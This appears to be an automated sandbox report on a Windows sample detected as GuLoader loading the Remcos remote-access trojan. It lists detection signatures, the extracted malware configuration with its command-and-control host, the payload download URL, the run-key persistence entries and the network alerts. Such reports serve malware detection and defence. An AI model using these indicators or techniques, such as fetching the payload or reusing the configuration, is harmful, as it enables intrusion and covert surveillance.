Edit tour

Windows Analysis Report
KO0q4biYfC.exe

Overview

General Information

Sample name:	KO0q4biYfC.exe renamed because original name is a hash value
Original sample name:	03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e.exe
Analysis ID:	1585953
MD5:	dd935b0e91e2e551b21296d8fa186d11
SHA1:	9638372c80f866bdc1b73af7971918e8ba7ab9e7
SHA256:	03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e
Tags:	exeuser-adrian__luca
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Drops PE files with a suspicious file extension

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

KO0q4biYfC.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\KO0q4biYfC.exe" MD5: DD935B0E91E2E551B21296D8FA186D11)

KO0q4biYfC.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\KO0q4biYfC.exe" MD5: DD935B0E91E2E551B21296D8FA186D11)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["newkezfill.site:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B0AIE8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: KO0q4biYfC.exe PID: 6596	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hulske

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hulske

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetFilename: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetFilename: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 5B 2E 20 9B 00 B7 D9 5E 93 3D 75 DB D2 20 EF 4D CB C6 B0 94 A1 D0 92 96 F7 16 66 22 EA 42 4C 69 DB CD 8C 5C 45 7A 1F F6 B7 B3 4C 9D F9 D0 F3 01 5B 0E 8C 3C 06 4F 3E 29 B9 60 DE 22 6F AD A7 78 FC 09 31 1B C4 49 58 1B AD FD 2E FC 90 BA 9A D7 E6 18 39 76 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KO0q4biYfC.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B0AIE8\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:07:57.807858+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49979	87.120.84.23	2404	TCP
2025-01-08T15:08:57.740105+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49830	87.120.84.23	2404	TCP
2025-01-08T15:09:20.148425+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49969	87.120.84.23	2404	TCP
2025-01-08T15:09:42.537707+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49972	87.120.84.23	2404	TCP
2025-01-08T15:10:04.942338+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49973	87.120.84.23	2404	TCP
2025-01-08T15:10:27.348794+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49974	87.120.84.23	2404	TCP
2025-01-08T15:10:49.740018+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49975	87.120.84.23	2404	TCP
2025-01-08T15:11:12.134329+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49976	87.120.84.23	2404	TCP
2025-01-08T15:11:34.522128+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49977	87.120.84.23	2404	TCP
2025-01-08T15:11:56.881424+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49978	87.120.84.23	2404	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:08:32.533594+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49794	164.160.91.32	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["newkezfill.site:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B0AIE8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: KO0q4biYfC.exe	ReversingLabs: Detection: 42%
Source: KO0q4biYfC.exe	Virustotal: Detection: 52%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: KO0q4biYfC.exe

Joe Sandbox ML: detected

Source: KO0q4biYfC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.7:49794 version: TLS 1.2

Source: KO0q4biYfC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00402868 FindFirstFileW,	8_2_00402868
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_0040672B FindFirstFileW,FindClose,	8_2_0040672B
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	8_2_00405AFA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49830 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49972 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49976 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49974 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49975 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49969 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49977 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49973 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 87.120.84.23:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 87.120.84.23:2404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: newkezfill.site

Source: global traffic

TCP traffic: 192.168.2.7:49830 -> 87.120.84.23:2404

Source: Joe Sandbox View

ASN Name: SHARCOM-ASBG SHARCOM-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49794 -> 164.160.91.32:443

Source: global traffic

HTTP traffic detected: GET /PLBVeySxbfKXMM176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.healthselflesssupplies.co.za
Source: global traffic	DNS traffic detected: DNS query: newkezfill.site

Source: KO0q4biYfC.exe, Plderer180.scr.8.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/
Source: KO0q4biYfC.exe, 00000008.00000002.3700783468.00000000086F0000.00000004.00001000.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006AE8000.00000004.00000020.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.bin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.7:49794 version: TLS 1.2

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		8_2_004034A5

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_73C61B5F	0_2_73C61B5F
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00404DCC	8_2_00404DCC
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00406AF2	8_2_00406AF2

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: String function: 00402C41 appears 49 times

Source: KO0q4biYfC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/11@2/2

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		8_2_004034A5

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File created: C:\Users\user\AppData\Roaming\brugser

Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-B0AIE8

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsv399F.tmp

Jump to behavior

Source: KO0q4biYfC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KO0q4biYfC.exe	ReversingLabs: Detection: 42%
Source: KO0q4biYfC.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File read: C:\Users\user\Desktop\KO0q4biYfC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: cryptbase.dll	Jump to behavior
